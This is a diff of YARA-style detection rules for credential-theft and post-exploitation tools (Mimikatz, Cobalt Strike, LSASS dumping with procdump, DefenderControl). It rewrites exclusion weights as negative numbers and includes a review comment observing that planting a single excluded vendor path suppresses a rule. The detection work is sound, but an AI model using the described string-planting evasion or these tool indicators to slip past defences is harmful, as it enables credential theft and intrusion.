((#a_00_0 & 1)*1+(#a_00_1 & 1)*1+(#a_00_2 & 1)*1+(#a_00_3 & 1)*1+(#a_00_4 & 1)*1+(#a_00_5 & 1)*1+(#a_00_6 & 1)*1+(#a_00_7 & 1)*2+(#a_80_8 & 1)*-20+(#a_80_9 & 1)*-20+(#a_80_10 & 1)*-20+(#a_80_11 & 1)*-20+(#a_80_12 & 1)*-20+(#a_80_13 & 1)*-20+(#a_80_14 & 1)*-20+(#a_80_15 & 1)*-20+(#a_80_16 & 1)*-20) >=7
}
rule HackTool_PowerShell_Mikatz_dha__2{
@ -36,17 +36,17 @@ rule HackTool_PowerShell_Mikatz_dha__2{
$a_00_3 = {24 00 50 00 45 00 42 00 79 00 74 00 65 00 73 00 33 00 32 00 } //1 $PEBytes32
$a_00_4 = {2e 00 44 00 65 00 66 00 69 00 6e 00 65 00 46 00 69 00 65 00 6c 00 64 00 28 00 27 00 56 00 69 00 72 00 74 00 75 00 61 00 6c 00 41 00 64 00 64 00 72 00 65 00 73 00 73 00 27 00 2c 00 20 00 5b 00 55 00 49 00 6e 00 74 00 33 00 32 00 5d 00 } //1 .DefineField('VirtualAddress', [UInt32]
$a_00_5 = {2e 00 47 00 65 00 74 00 4d 00 65 00 74 00 68 00 6f 00 64 00 28 00 27 00 47 00 65 00 74 00 50 00 72 00 6f 00 63 00 41 00 64 00 64 00 72 00 65 00 73 00 73 00 27 00 } //1 .GetMethod('GetProcAddress'
$a_80_6 = {77 69 6e 64 6f 77 73 5c 6b 65 76 6c 61 72 2d 61 70 69 5c 6b 65 76 6c 61 72 73 69 67 73 } //windows\kevlar-api\kevlarsigs 65516
$a_80_7 = {5c 6b 65 76 6c 61 72 2d 61 70 69 5c 6b 65 76 6c 61 72 73 69 67 73 36 34 5c 78 36 34 5c 72 65 6c 65 61 73 65 5c 48 49 50 48 61 6e 64 6c 65 72 73 36 34 2e 70 64 62 } //\kevlar-api\kevlarsigs64\x64\release\HIPHandlers64.pdb 65516
$a_80_8 = {5c 6d 63 61 66 65 65 5c 68 6f 73 74 20 69 6e 74 72 75 73 69 6f 6e 20 70 72 65 76 65 6e 74 69 6f 6e 5c 68 69 70 } //\mcafee\host intrusion prevention\hip 65516
$a_80_9 = {5c 6d 63 61 66 65 65 5c 65 6e 64 70 6f 69 6e 74 20 73 65 63 75 72 69 74 79 5c } //\mcafee\endpoint security\ 65516
$a_80_10 = {5c 74 68 72 65 61 74 20 70 72 65 76 65 6e 74 69 6f 6e 5c 69 70 73 5c 68 69 70 68 61 6e 64 6c 65 72 73 } //\threat prevention\ips\hiphandlers 65516
$a_80_11 = {5c 73 64 6b 2e 70 72 6f 74 65 63 74 6f 72 5c 6d 69 6e 6f 72 5c 78 36 34 5c 52 65 6c 65 61 73 65 5c 50 72 6f 74 65 63 74 6f 72 36 34 2e 70 64 62 } //\sdk.protector\minor\x64\Release\Protector64.pdb 65516
$a_80_12 = {6d 6f 72 70 68 69 73 65 63 5f 64 6c 6c 5f 76 65 72 73 69 6f 6e 5f 73 } //morphisec_dll_version_s 65516
$a_80_13 = {6d 6f 72 70 68 69 73 65 63 5f 70 72 6f 64 75 63 74 5f 76 65 72 73 69 6f 6e 5f 73 } //morphisec_product_version_s 65516
$a_80_14 = {5c 78 36 34 5c 52 65 6c 65 61 73 65 5c 50 72 6f 74 65 63 74 6f 72 53 65 72 76 69 63 65 36 34 2e 70 64 62 } //\x64\Release\ProtectorService64.pdb 65516
$a_80_6 = {77 69 6e 64 6f 77 73 5c 6b 65 76 6c 61 72 2d 61 70 69 5c 6b 65 76 6c 61 72 73 69 67 73 } //windows\kevlar-api\kevlarsigs -20
$a_80_7 = {5c 6b 65 76 6c 61 72 2d 61 70 69 5c 6b 65 76 6c 61 72 73 69 67 73 36 34 5c 78 36 34 5c 72 65 6c 65 61 73 65 5c 48 49 50 48 61 6e 64 6c 65 72 73 36 34 2e 70 64 62 } //\kevlar-api\kevlarsigs64\x64\release\HIPHandlers64.pdb -20
$a_80_8 = {5c 6d 63 61 66 65 65 5c 68 6f 73 74 20 69 6e 74 72 75 73 69 6f 6e 20 70 72 65 76 65 6e 74 69 6f 6e 5c 68 69 70 } //\mcafee\host intrusion prevention\hip -20
$a_80_9 = {5c 6d 63 61 66 65 65 5c 65 6e 64 70 6f 69 6e 74 20 73 65 63 75 72 69 74 79 5c } //\mcafee\endpoint security\ -20
$a_80_10 = {5c 74 68 72 65 61 74 20 70 72 65 76 65 6e 74 69 6f 6e 5c 69 70 73 5c 68 69 70 68 61 6e 64 6c 65 72 73 } //\threat prevention\ips\hiphandlers -20
$a_80_11 = {5c 73 64 6b 2e 70 72 6f 74 65 63 74 6f 72 5c 6d 69 6e 6f 72 5c 78 36 34 5c 52 65 6c 65 61 73 65 5c 50 72 6f 74 65 63 74 6f 72 36 34 2e 70 64 62 } //\sdk.protector\minor\x64\Release\Protector64.pdb -20
$a_80_12 = {6d 6f 72 70 68 69 73 65 63 5f 64 6c 6c 5f 76 65 72 73 69 6f 6e 5f 73 } //morphisec_dll_version_s -20
$a_80_13 = {6d 6f 72 70 68 69 73 65 63 5f 70 72 6f 64 75 63 74 5f 76 65 72 73 69 6f 6e 5f 73 } //morphisec_product_version_s -20
$a_80_14 = {5c 78 36 34 5c 52 65 6c 65 61 73 65 5c 50 72 6f 74 65 63 74 6f 72 53 65 72 76 69 63 65 36 34 2e 70 64 62 } //\x64\Release\ProtectorService64.pdb -20
condition:
((#a_00_0 & 1)*1+(#a_00_1 & 1)*1+(#a_00_2 & 1)*1+(#a_00_3 & 1)*1+(#a_00_4 & 1)*1+(#a_00_5 & 1)*1+(#a_80_6 & 1)*65516+(#a_80_7 & 1)*65516+(#a_80_8 & 1)*65516+(#a_80_9 & 1)*65516+(#a_80_10 & 1)*65516+(#a_80_11 & 1)*65516+(#a_80_12 & 1)*65516+(#a_80_13 & 1)*65516+(#a_80_14 & 1)*65516) >=6
((#a_00_0 & 1)*1+(#a_00_1 & 1)*1+(#a_00_2 & 1)*1+(#a_00_3 & 1)*1+(#a_00_4 & 1)*1+(#a_00_5 & 1)*1+(#a_80_6 & 1)*-20+(#a_80_7 & 1)*-20+(#a_80_8 & 1)*-20+(#a_80_9 & 1)*-20+(#a_80_10 & 1)*-20+(#a_80_11 & 1)*-20+(#a_80_12 & 1)*-20+(#a_80_13 & 1)*-20+(#a_80_14 & 1)*-20) >=6
}
rule HackTool_PowerShell_Mikatz_dha__3{
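Review bot: The nine -20 strings in both rules are ASCII PDB and install paths of third-party security products (`\mcafee\host intrusion prevention\hip`, `\sdk.protector\…\Protector64.pdb`, `morphisec_*`), presumably present because those binaries legitimately embed Mimikatz indicators, but nothing in either rule says so and a maintainer could mistake them for detection strings. A comment above the block, e.g. `// vendor artefacts that embed mimikatz strings: any hit vetoes the rule — confirm`, would carry that intent. Because the positives total only 9 and 6 respectively, a single -20 hit always suppresses the rule, so these literal paths are also a trivial planted-string evasion worth noting. Both rules' first strings and the `_3` rule are outside the hunks.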


@ -10,11 +10,11 @@ rule HackTool_Win32_CobaltStrike_B{
$a_03_3 = {4e 4f 4e 4f 4e 4c 90 01 02 4e 4c 4e 4f 4e 4c 90 00 } //1
$a_03_4 = {75 da c9 c3 8b 0d 90 01 04 8b 04 d1 8b 54 d1 04 c3 90 00 } //1
$a_03_5 = {33 c9 41 51 6a 02 58 50 ff 32 8b 55 90 01 01 51 50 ff 32 8b 55 90 01 01 51 50 ff 32 8b 55 90 01 01 51 50 ff 32 8b 55 90 01 01 51 50 ff 32 8b 55 90 01 01 51 50 ff 32 51 50 ff 33 51 50 ff 75 90 01 01 51 50 68 a2 90 00 } //10
$a_01_6 = {42 65 68 61 76 69 6f 72 3a } //65436 Behavior:
$a_01_7 = {54 72 6f 6a 61 6e 3a } //65436 Trojan:
$a_01_8 = {6d 70 61 74 74 72 69 62 75 74 65 } //65436 mpattribute
$a_01_9 = {48 61 63 6b 54 6f 6f 6c 3a } //65436 HackTool:
$a_01_6 = {42 65 68 61 76 69 6f 72 3a } //-100 Behavior:
$a_01_7 = {54 72 6f 6a 61 6e 3a } //-100 Trojan:
$a_01_8 = {6d 70 61 74 74 72 69 62 75 74 65 } //-100 mpattribute
$a_01_9 = {48 61 63 6b 54 6f 6f 6c 3a } //-100 HackTool:
condition:
((#a_03_0 & 1)*1+(#a_03_1 & 1)*1+(#a_03_2 & 1)*1+(#a_03_3 & 1)*1+(#a_03_4 & 1)*1+(#a_03_5 & 1)*10+(#a_01_6 & 1)*65436+(#a_01_7 & 1)*65436+(#a_01_8 & 1)*65436+(#a_01_9 & 1)*65436) >=11
((#a_03_0 & 1)*1+(#a_03_1 & 1)*1+(#a_03_2 & 1)*1+(#a_03_3 & 1)*1+(#a_03_4 & 1)*1+(#a_03_5 & 1)*10+(#a_01_6 & 1)*-100+(#a_01_7 & 1)*-100+(#a_01_8 & 1)*-100+(#a_01_9 & 1)*-100) >=11
}


@ -9,11 +9,11 @@ rule HackTool_Win32_CobaltStrike_B_{
$a_03_2 = {2e 2f 2e 2f 2e 2c 90 01 02 2e 2c 2e 2f 2e 2c 90 00 } //1
$a_03_3 = {75 da c9 c3 8b 0d 90 01 04 8b 04 d1 8b 54 d1 04 c3 90 00 } //1
$a_03_4 = {33 c9 41 51 6a 02 58 50 ff 32 8b 55 90 01 01 51 50 ff 32 8b 55 90 01 01 51 50 ff 32 8b 55 90 01 01 51 50 ff 32 8b 55 90 01 01 51 50 ff 32 8b 55 90 01 01 51 50 ff 32 51 50 ff 33 51 50 ff 75 90 01 01 51 50 68 a2 90 00 } //10
$a_01_5 = {42 65 68 61 76 69 6f 72 3a } //65436 Behavior:
$a_01_6 = {54 72 6f 6a 61 6e 3a } //65436 Trojan:
$a_01_7 = {6d 70 61 74 74 72 69 62 75 74 65 } //65436 mpattribute
$a_01_8 = {48 61 63 6b 54 6f 6f 6c 3a } //65436 HackTool:
$a_01_5 = {42 65 68 61 76 69 6f 72 3a } //-100 Behavior:
$a_01_6 = {54 72 6f 6a 61 6e 3a } //-100 Trojan:
$a_01_7 = {6d 70 61 74 74 72 69 62 75 74 65 } //-100 mpattribute
$a_01_8 = {48 61 63 6b 54 6f 6f 6c 3a } //-100 HackTool:
condition:
((#a_03_0 & 1)*1+(#a_03_1 & 1)*1+(#a_03_2 & 1)*1+(#a_03_3 & 1)*1+(#a_03_4 & 1)*10+(#a_01_5 & 1)*65436+(#a_01_6 & 1)*65436+(#a_01_7 & 1)*65436+(#a_01_8 & 1)*65436) >=11
((#a_03_0 & 1)*1+(#a_03_1 & 1)*1+(#a_03_2 & 1)*1+(#a_03_3 & 1)*1+(#a_03_4 & 1)*10+(#a_01_5 & 1)*-100+(#a_01_6 & 1)*-100+(#a_01_7 & 1)*-100+(#a_01_8 & 1)*-100) >=11
}


@ -10,11 +10,11 @@ rule HackTool_Win32_CobaltStrike_C{
$a_03_3 = {4e 4f 4e 4f 4e 4c 90 01 02 4e 4c 4e 4f 4e 4c 90 00 } //1
$a_03_4 = {75 da c9 c3 8b 0d 90 01 04 8b 04 d1 8b 54 d1 04 c3 90 00 } //1
$a_03_5 = {40 3d 00 10 00 00 7c f1 90 09 07 00 80 90 01 05 90 17 03 01 01 01 2e 69 4e 40 90 00 } //10
$a_01_6 = {42 65 68 61 76 69 6f 72 3a } //65436 Behavior:
$a_01_7 = {54 72 6f 6a 61 6e 3a } //65436 Trojan:
$a_01_8 = {6d 70 61 74 74 72 69 62 75 74 65 } //65436 mpattribute
$a_01_9 = {48 61 63 6b 54 6f 6f 6c 3a } //65436 HackTool:
$a_01_6 = {42 65 68 61 76 69 6f 72 3a } //-100 Behavior:
$a_01_7 = {54 72 6f 6a 61 6e 3a } //-100 Trojan:
$a_01_8 = {6d 70 61 74 74 72 69 62 75 74 65 } //-100 mpattribute
$a_01_9 = {48 61 63 6b 54 6f 6f 6c 3a } //-100 HackTool:
condition:
((#a_03_0 & 1)*1+(#a_03_1 & 1)*1+(#a_03_2 & 1)*1+(#a_03_3 & 1)*1+(#a_03_4 & 1)*1+(#a_03_5 & 1)*10+(#a_01_6 & 1)*65436+(#a_01_7 & 1)*65436+(#a_01_8 & 1)*65436+(#a_01_9 & 1)*65436) >=11
((#a_03_0 & 1)*1+(#a_03_1 & 1)*1+(#a_03_2 & 1)*1+(#a_03_3 & 1)*1+(#a_03_4 & 1)*1+(#a_03_5 & 1)*10+(#a_01_6 & 1)*-100+(#a_01_7 & 1)*-100+(#a_01_8 & 1)*-100+(#a_01_9 & 1)*-100) >=11
}


@ -9,11 +9,11 @@ rule HackTool_Win32_CobaltStrike_C_{
$a_03_2 = {2e 2f 2e 2f 2e 2c 90 01 02 2e 2c 2e 2f 2e 2c 90 00 } //1
$a_03_3 = {75 da c9 c3 8b 0d 90 01 04 8b 04 d1 8b 54 d1 04 c3 90 00 } //1
$a_03_4 = {40 3d 00 10 00 00 7c f1 90 09 07 00 80 90 01 05 90 03 01 01 2e 69 40 90 00 } //10
$a_01_5 = {42 65 68 61 76 69 6f 72 3a } //65436 Behavior:
$a_01_6 = {54 72 6f 6a 61 6e 3a } //65436 Trojan:
$a_01_7 = {6d 70 61 74 74 72 69 62 75 74 65 } //65436 mpattribute
$a_01_8 = {48 61 63 6b 54 6f 6f 6c 3a } //65436 HackTool:
$a_01_5 = {42 65 68 61 76 69 6f 72 3a } //-100 Behavior:
$a_01_6 = {54 72 6f 6a 61 6e 3a } //-100 Trojan:
$a_01_7 = {6d 70 61 74 74 72 69 62 75 74 65 } //-100 mpattribute
$a_01_8 = {48 61 63 6b 54 6f 6f 6c 3a } //-100 HackTool:
condition:
((#a_03_0 & 1)*1+(#a_03_1 & 1)*1+(#a_03_2 & 1)*1+(#a_03_3 & 1)*1+(#a_03_4 & 1)*10+(#a_01_5 & 1)*65436+(#a_01_6 & 1)*65436+(#a_01_7 & 1)*65436+(#a_01_8 & 1)*65436) >=11
((#a_03_0 & 1)*1+(#a_03_1 & 1)*1+(#a_03_2 & 1)*1+(#a_03_3 & 1)*1+(#a_03_4 & 1)*10+(#a_01_5 & 1)*-100+(#a_01_6 & 1)*-100+(#a_01_7 & 1)*-100+(#a_01_8 & 1)*-100) >=11
}


@ -10,11 +10,11 @@ rule HackTool_Win32_CobaltStrike_D{
$a_03_3 = {4e 4f 4e 4f 4e 4c 90 01 02 4e 4c 4e 4f 4e 4c 90 00 } //1
$a_03_4 = {75 da c9 c3 8b 0d 90 01 04 8b 04 d1 8b 54 d1 04 c3 90 00 } //1
$a_03_5 = {68 00 00 10 00 90 02 3c 50 68 7f 66 04 40 ff 76 1c 90 02 08 81 7d fc fc ff 0f 00 90 00 } //10
$a_01_6 = {42 65 68 61 76 69 6f 72 3a } //65436 Behavior:
$a_01_7 = {54 72 6f 6a 61 6e 3a } //65436 Trojan:
$a_01_8 = {6d 70 61 74 74 72 69 62 75 74 65 } //65436 mpattribute
$a_01_9 = {48 61 63 6b 54 6f 6f 6c 3a } //65436 HackTool:
$a_01_6 = {42 65 68 61 76 69 6f 72 3a } //-100 Behavior:
$a_01_7 = {54 72 6f 6a 61 6e 3a } //-100 Trojan:
$a_01_8 = {6d 70 61 74 74 72 69 62 75 74 65 } //-100 mpattribute
$a_01_9 = {48 61 63 6b 54 6f 6f 6c 3a } //-100 HackTool:
condition:
((#a_03_0 & 1)*1+(#a_03_1 & 1)*1+(#a_03_2 & 1)*1+(#a_03_3 & 1)*1+(#a_03_4 & 1)*1+(#a_03_5 & 1)*10+(#a_01_6 & 1)*65436+(#a_01_7 & 1)*65436+(#a_01_8 & 1)*65436+(#a_01_9 & 1)*65436) >=11
((#a_03_0 & 1)*1+(#a_03_1 & 1)*1+(#a_03_2 & 1)*1+(#a_03_3 & 1)*1+(#a_03_4 & 1)*1+(#a_03_5 & 1)*10+(#a_01_6 & 1)*-100+(#a_01_7 & 1)*-100+(#a_01_8 & 1)*-100+(#a_01_9 & 1)*-100) >=11
}


@ -9,11 +9,11 @@ rule HackTool_Win32_CobaltStrike_D_{
$a_03_2 = {2e 2f 2e 2f 2e 2c 90 01 02 2e 2c 2e 2f 2e 2c 90 00 } //1
$a_03_3 = {75 da c9 c3 8b 0d 90 01 04 8b 04 d1 8b 54 d1 04 c3 90 00 } //1
$a_03_4 = {68 00 00 10 00 90 02 3c 50 68 7f 66 04 40 ff 76 1c 90 02 08 81 7d fc fc ff 0f 00 90 00 } //10
$a_01_5 = {42 65 68 61 76 69 6f 72 3a } //65436 Behavior:
$a_01_6 = {54 72 6f 6a 61 6e 3a } //65436 Trojan:
$a_01_7 = {6d 70 61 74 74 72 69 62 75 74 65 } //65436 mpattribute
$a_01_8 = {48 61 63 6b 54 6f 6f 6c 3a } //65436 HackTool:
$a_01_5 = {42 65 68 61 76 69 6f 72 3a } //-100 Behavior:
$a_01_6 = {54 72 6f 6a 61 6e 3a } //-100 Trojan:
$a_01_7 = {6d 70 61 74 74 72 69 62 75 74 65 } //-100 mpattribute
$a_01_8 = {48 61 63 6b 54 6f 6f 6c 3a } //-100 HackTool:
condition:
((#a_03_0 & 1)*1+(#a_03_1 & 1)*1+(#a_03_2 & 1)*1+(#a_03_3 & 1)*1+(#a_03_4 & 1)*10+(#a_01_5 & 1)*65436+(#a_01_6 & 1)*65436+(#a_01_7 & 1)*65436+(#a_01_8 & 1)*65436) >=11
((#a_03_0 & 1)*1+(#a_03_1 & 1)*1+(#a_03_2 & 1)*1+(#a_03_3 & 1)*1+(#a_03_4 & 1)*10+(#a_01_5 & 1)*-100+(#a_01_6 & 1)*-100+(#a_01_7 & 1)*-100+(#a_01_8 & 1)*-100) >=11
}


@ -7,13 +7,13 @@ rule HackTool_Win32_CobaltStrike_F{
$a_03_0 = {33 d2 6a 0d 8b c1 5b f7 f3 8a 44 90 01 01 08 30 90 01 01 41 90 00 } //1
$a_01_1 = {8b 3b 89 c8 31 d2 01 cf 41 89 7d e0 bf 0d 00 00 00 f7 f7 8a 44 13 08 8b 55 e0 30 02 } //1
$a_01_2 = {8b 45 08 89 cf bb 0d 00 00 00 31 d2 03 38 89 c8 41 f7 f3 8b 45 08 8a 44 10 08 8a 44 10 08 30 07 } //1
$a_01_3 = {42 65 68 61 76 69 6f 72 3a } //65436 Behavior:
$a_01_4 = {54 72 6f 6a 61 6e 3a } //65436 Trojan:
$a_01_5 = {6d 70 61 74 74 72 69 62 75 74 65 } //65436 mpattribute
$a_01_6 = {48 61 63 6b 54 6f 6f 6c 3a } //65436 HackTool:
$a_01_7 = {7f 00 00 18 00 00 00 00 00 00 00 ff ff ff ff } //65436
$a_01_8 = {f7 7f 00 00 2a 00 00 00 00 00 00 00 ff ff ff ff } //65436
$a_01_3 = {42 65 68 61 76 69 6f 72 3a } //-100 Behavior:
$a_01_4 = {54 72 6f 6a 61 6e 3a } //-100 Trojan:
$a_01_5 = {6d 70 61 74 74 72 69 62 75 74 65 } //-100 mpattribute
$a_01_6 = {48 61 63 6b 54 6f 6f 6c 3a } //-100 HackTool:
$a_01_7 = {7f 00 00 18 00 00 00 00 00 00 00 ff ff ff ff } //-100
$a_01_8 = {f7 7f 00 00 2a 00 00 00 00 00 00 00 ff ff ff ff } //-100
condition:
((#a_03_0 & 1)*1+(#a_01_1 & 1)*1+(#a_01_2 & 1)*1+(#a_01_3 & 1)*65436+(#a_01_4 & 1)*65436+(#a_01_5 & 1)*65436+(#a_01_6 & 1)*65436+(#a_01_7 & 1)*65436+(#a_01_8 & 1)*65436) >=1
((#a_03_0 & 1)*1+(#a_01_1 & 1)*1+(#a_01_2 & 1)*1+(#a_01_3 & 1)*-100+(#a_01_4 & 1)*-100+(#a_01_5 & 1)*-100+(#a_01_6 & 1)*-100+(#a_01_7 & 1)*-100+(#a_01_8 & 1)*-100) >=1
}


@ -7,11 +7,11 @@ rule HackTool_Win32_CobaltStrike_F_{
$a_03_0 = {33 d2 6a 0d 8b c1 5b f7 f3 8a 44 90 01 01 08 30 90 01 01 41 90 00 } //1
$a_01_1 = {8b 3b 89 c8 31 d2 01 cf 41 89 7d e0 bf 0d 00 00 00 f7 f7 8a 44 13 08 8b 55 e0 30 02 } //1
$a_01_2 = {8b 45 08 89 cf bb 0d 00 00 00 31 d2 03 38 89 c8 41 f7 f3 8b 45 08 8a 44 10 08 8a 44 10 08 30 07 } //1
$a_01_3 = {42 65 68 61 76 69 6f 72 3a } //65436 Behavior:
$a_01_4 = {54 72 6f 6a 61 6e 3a } //65436 Trojan:
$a_01_5 = {6d 70 61 74 74 72 69 62 75 74 65 } //65436 mpattribute
$a_01_6 = {48 61 63 6b 54 6f 6f 6c 3a } //65436 HackTool:
$a_01_3 = {42 65 68 61 76 69 6f 72 3a } //-100 Behavior:
$a_01_4 = {54 72 6f 6a 61 6e 3a } //-100 Trojan:
$a_01_5 = {6d 70 61 74 74 72 69 62 75 74 65 } //-100 mpattribute
$a_01_6 = {48 61 63 6b 54 6f 6f 6c 3a } //-100 HackTool:
condition:
((#a_03_0 & 1)*1+(#a_01_1 & 1)*1+(#a_01_2 & 1)*1+(#a_01_3 & 1)*65436+(#a_01_4 & 1)*65436+(#a_01_5 & 1)*65436+(#a_01_6 & 1)*65436) >=1
((#a_03_0 & 1)*1+(#a_01_1 & 1)*1+(#a_01_2 & 1)*1+(#a_01_3 & 1)*-100+(#a_01_4 & 1)*-100+(#a_01_5 & 1)*-100+(#a_01_6 & 1)*-100) >=1
}


@ -5,8 +5,8 @@ rule HackTool_Win32_CobaltStrike_G{
strings :
$a_03_0 = {08 00 00 00 00 00 00 00 00 01 90 01 07 01 90 01 07 02 90 01 07 02 90 01 07 01 90 01 0f 03 90 01 07 03 90 00 } //1
$a_01_1 = {70 3f 00 47 0e 00 00 1c 04 00 00 e0 01 24 00 64 55 55 55 55 56 56 56 56 } //65436
$a_01_1 = {70 3f 00 47 0e 00 00 1c 04 00 00 e0 01 24 00 64 55 55 55 55 56 56 56 56 } //-100
condition:
((#a_03_0 & 1)*1+(#a_01_1 & 1)*65436) >=1
((#a_03_0 & 1)*1+(#a_01_1 & 1)*-100) >=1
}


@ -5,8 +5,8 @@ rule HackTool_Win32_CobaltStrike_G_{
strings :
$a_03_0 = {08 00 00 00 00 00 00 00 00 01 90 01 07 01 90 01 07 02 90 01 07 02 90 01 07 01 90 01 0f 03 90 01 07 03 90 00 } //1
$a_01_1 = {70 3f 00 47 0e 00 00 1c 04 00 00 e0 01 24 00 64 55 55 55 55 56 56 56 56 } //65436
$a_01_1 = {70 3f 00 47 0e 00 00 1c 04 00 00 e0 01 24 00 64 55 55 55 55 56 56 56 56 } //-100
condition:
((#a_03_0 & 1)*1+(#a_01_1 & 1)*65436) >=1
((#a_03_0 & 1)*1+(#a_01_1 & 1)*-100) >=1
}


@ -4,12 +4,12 @@ rule HackTool_Win32_Defendercontrol_C{
description = "HackTool:Win32/Defendercontrol.C,SIGNATURE_TYPE_PEHSTR_EXT,0c 00 0c 00 05 00 00 "
strings :
$a_80_0 = {4f 6e 65 43 79 62 65 72 } //OneCyber 65526
$a_80_0 = {4f 6e 65 43 79 62 65 72 } //OneCyber -10
$a_80_1 = {77 77 77 2e 73 6f 72 64 75 6d 2e 6f 72 67 } //www.sordum.org 10
$a_80_2 = {64 43 6f 6e 74 72 6f 6c 2e 65 78 65 } //dControl.exe 1
$a_80_3 = {64 66 43 6f 6e 74 72 6f 6c 2e 65 78 65 } //dfControl.exe 1
$a_80_4 = {41 75 74 6f 49 74 } //AutoIt 1
condition:
((#a_80_0 & 1)*65526+(#a_80_1 & 1)*10+(#a_80_2 & 1)*1+(#a_80_3 & 1)*1+(#a_80_4 & 1)*1) >=12
((#a_80_0 & 1)*-10+(#a_80_1 & 1)*10+(#a_80_2 & 1)*1+(#a_80_3 & 1)*1+(#a_80_4 & 1)*1) >=12
}


@ -4,12 +4,12 @@ rule HackTool_Win32_DumpLsass_B{
description = "HackTool:Win32/DumpLsass.B,SIGNATURE_TYPE_CMDHSTR_EXT,03 00 03 00 05 00 00 "
strings :
$a_00_0 = {5c 00 50 00 72 00 6f 00 67 00 72 00 61 00 6d 00 44 00 61 00 74 00 61 00 5c 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 5c 00 41 00 7a 00 75 00 72 00 65 00 57 00 61 00 74 00 73 00 6f 00 6e 00 5c 00 30 00 5c 00 70 00 72 00 6f 00 63 00 64 00 75 00 6d 00 70 00 } //65534 \ProgramData\Microsoft\AzureWatson\0\procdump
$a_02_1 = {2d 00 6a 00 20 00 90 02 04 5c 00 50 00 72 00 6f 00 67 00 72 00 61 00 6d 00 44 00 61 00 74 00 61 00 5c 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 5c 00 57 00 69 00 6e 00 64 00 6f 00 77 00 73 00 5c 00 57 00 45 00 52 00 5c 00 52 00 65 00 70 00 6f 00 72 00 74 00 51 00 75 00 65 00 75 00 65 00 90 00 } //65534
$a_00_0 = {5c 00 50 00 72 00 6f 00 67 00 72 00 61 00 6d 00 44 00 61 00 74 00 61 00 5c 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 5c 00 41 00 7a 00 75 00 72 00 65 00 57 00 61 00 74 00 73 00 6f 00 6e 00 5c 00 30 00 5c 00 70 00 72 00 6f 00 63 00 64 00 75 00 6d 00 70 00 } //-2 \ProgramData\Microsoft\AzureWatson\0\procdump
$a_02_1 = {2d 00 6a 00 20 00 90 02 04 5c 00 50 00 72 00 6f 00 67 00 72 00 61 00 6d 00 44 00 61 00 74 00 61 00 5c 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 5c 00 57 00 69 00 6e 00 64 00 6f 00 77 00 73 00 5c 00 57 00 45 00 52 00 5c 00 52 00 65 00 70 00 6f 00 72 00 74 00 51 00 75 00 65 00 75 00 65 00 90 00 } //-2
$a_00_2 = {5c 00 70 00 72 00 6f 00 63 00 64 00 75 00 6d 00 70 00 2e 00 65 00 78 00 65 00 } //2 \procdump.exe
$a_00_3 = {2d 00 6d 00 } //1 -m
$a_00_4 = {2f 00 6d 00 } //1 /m
condition:
((#a_00_0 & 1)*65534+(#a_02_1 & 1)*65534+(#a_00_2 & 1)*2+(#a_00_3 & 1)*1+(#a_00_4 & 1)*1) >=3
((#a_00_0 & 1)*-2+(#a_02_1 & 1)*-2+(#a_00_2 & 1)*2+(#a_00_3 & 1)*1+(#a_00_4 & 1)*1) >=3
}


@ -4,12 +4,12 @@ rule HackTool_Win32_DumpLsass_C{
description = "HackTool:Win32/DumpLsass.C,SIGNATURE_TYPE_CMDHSTR_EXT,0f 00 0f 00 05 00 00 "
strings :
$a_00_0 = {5c 00 50 00 72 00 6f 00 67 00 72 00 61 00 6d 00 44 00 61 00 74 00 61 00 5c 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 5c 00 41 00 7a 00 75 00 72 00 65 00 57 00 61 00 74 00 73 00 6f 00 6e 00 5c 00 30 00 5c 00 70 00 72 00 6f 00 63 00 64 00 75 00 6d 00 70 00 } //65526 \ProgramData\Microsoft\AzureWatson\0\procdump
$a_02_1 = {2d 00 6a 00 20 00 90 02 04 5c 00 50 00 72 00 6f 00 67 00 72 00 61 00 6d 00 44 00 61 00 74 00 61 00 5c 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 5c 00 57 00 69 00 6e 00 64 00 6f 00 77 00 73 00 5c 00 57 00 45 00 52 00 5c 00 52 00 65 00 70 00 6f 00 72 00 74 00 51 00 75 00 65 00 75 00 65 00 90 00 } //65526
$a_00_0 = {5c 00 50 00 72 00 6f 00 67 00 72 00 61 00 6d 00 44 00 61 00 74 00 61 00 5c 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 5c 00 41 00 7a 00 75 00 72 00 65 00 57 00 61 00 74 00 73 00 6f 00 6e 00 5c 00 30 00 5c 00 70 00 72 00 6f 00 63 00 64 00 75 00 6d 00 70 00 } //-10 \ProgramData\Microsoft\AzureWatson\0\procdump
$a_02_1 = {2d 00 6a 00 20 00 90 02 04 5c 00 50 00 72 00 6f 00 67 00 72 00 61 00 6d 00 44 00 61 00 74 00 61 00 5c 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 5c 00 57 00 69 00 6e 00 64 00 6f 00 77 00 73 00 5c 00 57 00 45 00 52 00 5c 00 52 00 65 00 70 00 6f 00 72 00 74 00 51 00 75 00 65 00 75 00 65 00 90 00 } //-10
$a_00_2 = {5c 00 70 00 72 00 6f 00 63 00 64 00 75 00 6d 00 70 00 2e 00 65 00 78 00 65 00 } //10 \procdump.exe
$a_00_3 = {2d 00 6d 00 } //5 -m
$a_00_4 = {2f 00 6d 00 } //5 /m
condition:
((#a_00_0 & 1)*65526+(#a_02_1 & 1)*65526+(#a_00_2 & 1)*10+(#a_00_3 & 1)*5+(#a_00_4 & 1)*5) >=15
((#a_00_0 & 1)*-10+(#a_02_1 & 1)*-10+(#a_00_2 & 1)*10+(#a_00_3 & 1)*5+(#a_00_4 & 1)*5) >=15
}


@ -4,12 +4,12 @@ rule HackTool_Win32_DumpLsass_E{
description = "HackTool:Win32/DumpLsass.E,SIGNATURE_TYPE_CMDHSTR_EXT,0f 00 0f 00 05 00 00 "
strings :
$a_00_0 = {5c 00 50 00 72 00 6f 00 67 00 72 00 61 00 6d 00 44 00 61 00 74 00 61 00 5c 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 5c 00 41 00 7a 00 75 00 72 00 65 00 57 00 61 00 74 00 73 00 6f 00 6e 00 5c 00 30 00 5c 00 70 00 72 00 6f 00 63 00 64 00 75 00 6d 00 70 00 } //65516 \ProgramData\Microsoft\AzureWatson\0\procdump
